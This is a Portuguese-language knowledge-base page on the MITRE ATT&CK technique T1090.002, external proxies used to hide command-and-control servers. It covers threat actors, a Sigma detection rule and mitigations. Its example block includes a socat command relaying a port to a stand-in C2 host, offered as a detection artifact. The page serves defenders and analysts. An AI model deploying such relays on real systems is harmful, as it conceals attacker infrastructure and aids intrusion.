t1090-002-external-proxy

# T1090.002 - Proxy Externo ## Técnica Pai Esta é uma sub-técnica de [[t1090-proxy|T1090 - T1090 - Proxy]]. ## Descrição Adversários utilizam proxies externos como intermediários para o tráfego de comando e controle, evitando conexões diretas com sua infraestrutura. Em vez de uma vítima se comúnicar diretamente com o servidor C2 do atacante, o tráfego é roteado através de um nó intermediário - geralmente um servidor comprometido, uma VPS alugada ou infraestrutura em nuvem - que então repassa as comúnicações ao destino real. Ferramentas como HTRAN, ZXProxy e ZXPortMap são amplamente utilizadas para implementar esse redirecionamento de portas. A técnica oferece ao atacante duas vantagens principais: resiliência operacional, pois a perda de um proxy não derruba o canal inteiro, e ofuscação de atribuição, pois o endereço IP visível para a vítima pertence ao proxy, não ao C2 real. Esse padrão é uma característica marcante de grupos APT sofisticados como [[g0016-apt29|APT29]], [[g0032-lazarus-group|Lazarus Group]] e [[g0007-apt28|APT28]]. Os proxies são selecionados estratégicamente com base em sua aparência legítima. Uma conexão saindo de uma rede corporativa para um provedor de nuvem reconhecido, por exemplo, desperta muito menos suspeita do que uma conexão direta para um IP desconhecido. Sistemas comprometidos de terceiros - como servidores de empresas parceiras ou provedores de serviço - também são frequentemente usados como proxies involuntários. Malwares como [[s0266-trickbot|TrickBot]], [[s0650-qakbot|QakBot]] e [[s0019-regin|Regin]] implementam variantes dessa técnica. Ferramentas de pós-exploração como [[s0699-mythic|Mythic]] também suportam encadeamento de proxies nativamente, facilitando o uso em operações red team e em campanhas APT reais. **Contexto Brasil/LATAM:** O Brasil é um dos países com maior número de sistemas comprometidos usados como proxies involuntários na América Latina. Grupos como [[g0091-silence|Silence]], que atuam contra instituições financeiras brasileiras, utilizam infraestrutura intermediária para dificultar o rastreamento de suas operações pelas equipes de resposta a incidentes locais. Provedores de hospedagem nacionais com menor capacidade de resposta a abuse reports são alvos preferênciais para montagem dessas cadeias de redirecionamento. ## Attack Flow ```mermaid graph TB A[Acesso Inicial] --> B[Instalar Redirector] B --> C[T1090.002 - Proxy Externo] C --> D[C2 Oculto] D --> E[Exfiltração / Lateral Movement] ``` ## Como Funciona **1. Preparação** O atacante provisiona ou compromete um servidor intermediário acessível na internet. Pode ser uma VPS alugada com criptomoeda, um servidor comprometido de terceiros ou uma instância em nuvem pública. Ferramentas de redirecionamento de portas são instaladas nesse intermediário. **2. Execução** O malware implantado na vítima recebe como destino o endereço do proxy, não o C2 real. Todo o tráfego - comandos, respostas, dados exfiltrados - flui através do proxy. O proxy repassa as conexões de forma transparente para o servidor C2 real, que permanece oculto. **3. Pós-execução** O atacante pode encadear múltiplos proxies (proxy chaining) para aumentar a ofuscação. Se um proxy for descoberto e bloqueado, outro é rapidamente provisionado. O C2 real nunca fica exposto diretamente às ferramentas de defesa da vítima. **Exemplo:** ```bash # Artefato de detecção: conexão saindo para IP externo em porta não-padrão # com volume de dados anômalo e padrão de beaconing regular # Exemplo de redirecionamento com socat (artefato em sistema comprometido) # socat TCP-LISTEN:8443,fork TCP:c2-real.exemplo.com:443 # Monitorar com: # netstat -an | grep ESTABLISHED | grep -v ':80\|:443\|:22' # ss -tnp | grep socat ``` ## Detecção **Fontes de dados:** Logs de firewall/proxy (outbound), NetFlow, DNS, Event ID 3 (Sysmon - Network Connection), Event ID 5156 (Windows Filtering Platform) ```yaml title: Detecção de Proxy Externo via Redirecionamento de Tráfego id: a7f3c2d1-84be-4e9a-b612-3f8a90d1e4c7 status: experimental description: Detecta padrões de beaconing e redirecionamento de porta associados ao uso de proxies externos para C2 logsource: category: network_connection product: windows detection: selection: EventID: 3 Initiated: 'true' DestinationPort|contains: - '8443' - '8080' - '4443' - '2222' filter_legitimate: DestinationIp|startswith: - '10.' - '172.16.' - '192.168.' condition: selection and not filter_legitimate falsepositives: - Ferramentas de desenvolvimento usando portas não-padrão - VPNs corporativas legítimas - Aplicações de monitoramento remoto level: medium tags: - attack.command_and_control - attack.t1090.002 ``` ## Mitigação | Mitigação | Recomendação Prática | |-----------|---------------------| | [[m1031-network-intrusion-prevention\|M1031 - Network Intrusion Prevention]] | Implementar IPS com assinaturas para ferramentas de redirecionamento conhecidas (HTRAN, ZXProxy). Bloquear conexões de saída para portas não-padrão sem justificativa de negócio. Monitorar padrões de beaconing com intervalos regulares. | ## Threat Actors que Usam - [[g0087-apt39|APT39]] - [[g0007-apt28|APT28]] - [[g0053-fin5|FIN5]] - [[g0131-tonto-team|Tonto Team]] - [[g0032-lazarus-group|Lazarus Group]] - [[g0045-apt10|menuPass]] - [[g0022-apt3|APT3]] - [[g0091-silence|Silence]] - [[g0093-gallium|GALLIUM]] - [[g0016-apt29|APT29]] ## Software Associado - [[s1084-quietexit|QUIETEXIT]] (malware) - [[s0444-shimrat|ShimRat]] (malware) - [[s0650-qakbot|QakBot]] (malware) - [[s0699-mythic|Mythic]] (ferramenta) - [[s0141-winnti-for-windows|Winnti for Windows]] (malware) - [[s0019-regin|Regin]] (malware) - [[s0223-powerstats|POWERSTATS]] (malware) - [[s0439-okrum|Okrum]] (malware) - [[s0266-trickbot|TrickBot]] (malware) - [[s0260-invisimole|InvisiMole]] (malware) --- *Fonte: [MITRE ATT&CK - T1090.002](https://attack.mitre.org/techniques/T1090/002)*